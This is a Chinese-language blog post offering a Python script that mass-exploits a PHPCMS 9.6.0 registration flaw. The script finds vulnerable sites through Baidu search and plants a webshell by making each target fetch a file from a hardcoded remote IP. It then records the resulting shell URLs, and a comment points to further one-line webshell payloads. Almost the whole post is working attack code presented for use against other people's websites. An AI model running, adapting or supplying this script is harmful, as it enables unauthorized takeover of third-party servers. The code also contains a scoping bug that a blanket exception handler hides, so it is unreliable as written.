介绍
- 一键化
python 1.py http://xxx.com - 不再是只允许执行一次有回显,加入了爆破,1-3s内即可找到你的webshell,不论是否有回显,只要成功
待办
- [] 加入对有验证码phpcms网站的支持
- [] 加入批量
说明
依赖库的安装pip install requests
代码
”’
———————-
Author : Akkuman
Blog : hacktech.cn
———————-
”’
import requests
from datetime import datetime
from bs4 import BeautifulSoup
# from urlparse import unquote //Python2
# from urlparse import urlparse //Python2
from urllib.parse import quote
from urllib.parse import urlparse
from random import Random
rand_name = ”
chars = ‘qwertyuiopasdfghjklzxcvbnm0123456789’
random = Random()
headers = {
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0”
}
def parseBaidu(keyword, pagenum):
keywordsBaseURL = ‘https://www.baidu.com/s?wd=’ + str(quote(keyword)) + ‘&oq=’ + str(quote(keyword)) + ‘&ie=utf-8’ + ‘&pn=’
pnum = 0
while pnum <= int(pagenum):
baseURL = keywordsBaseURL + str(pnum*10)
try:
request = requests.get(baseURL, headers=headers)
soup = BeautifulSoup(request.text, “html.parser”)
for a in soup.select(‘div.c-container > h3 > a’):
url = requests.get(a[‘href’], headers=headers).url
yield url
#urls = [requests.get(a[‘href’], headers=headers).url for a in soup.select(‘div.c-container > h3 > a’)]
#for url in urls:
#yield url
except:
yield None
finally:
pnum += 1
def getTime():
year = str(datetime.now().year)
month = “%02d” % datetime.now().month
day = “%02d” % datetime.now().day
hour = datetime.now().hour
hour = hour – 12 if hour > 12 else hour
hour = “%02d” % hour
minute = “%02d” % datetime.now().minute
second = “%02d” % datetime.now().second
microsecond = “%06d” % datetime.now().microsecond
microsecond = microsecond[:3]
nowTime = year + month + day + hour + minute + second + microsecond
return int(nowTime), year + “/” + month + day + “/”
def saveShell(shellUrl):
with open(“webShell.txt”,”a+”) as f:
f.write(“[*]%s\n” % shellUrl)
def main():
data = {
“siteid”: “1”,
“modelid”: “1”,
“username”: “akkumandsad”,
“password”: “123456”,
“email”: “akkakkumafa@qq.com”,
# 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0,普通一句话http://file.codecat.one/normalOneWord.txt
“info[content]”: “<img src=http://202.146.217.87/2.txt?.php#.jpg>”,
“dosubmit”: “1”,
“protocol”: “”,
}
for crawlUrl in parseBaidu(“inurl:index.php?m=member&c=index&a=register&siteid=1”, 10):
try:
if crawlUrl:
rand_name+=chars[random.randint(0, len(chars) – 1)]
data[“username”] = “akkuman_%s” % rand_name
data[“email”] = “akkuman_%s@qq.com” % rand_name
host = urlparse(crawlUrl).scheme + “://” + urlparse(crawlUrl).hostname
url = host + “/index.php?m=member&c=index&a=register&siteid=1”
startTime, _ = getTime()
htmlContent = requests.post(url, data=data, timeout=10)
finishTime, dateUrl = getTime()
successUrl = “”
if “MySQL Error” in htmlContent.text and “http” in htmlContent.text:
successUrl = htmlContent.text[htmlContent.text.index(“http”):htmlContent.text.index(“.php”)] + “.php”
print(“[*]Shell : %s” % successUrl)
saveShell(successUrl)
if successUrl == “”:
print(“[x]Failed : Failed to getshell.”)
else:
continue
except:
print(“Request Error”)
if __name__ == ‘__main__’:
main()
测试图
下载地址
- 本文链接: http://akkuman.coding.me/2017/04/10/phpcms9-6-0-getshell-with-python.html
- 版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处!
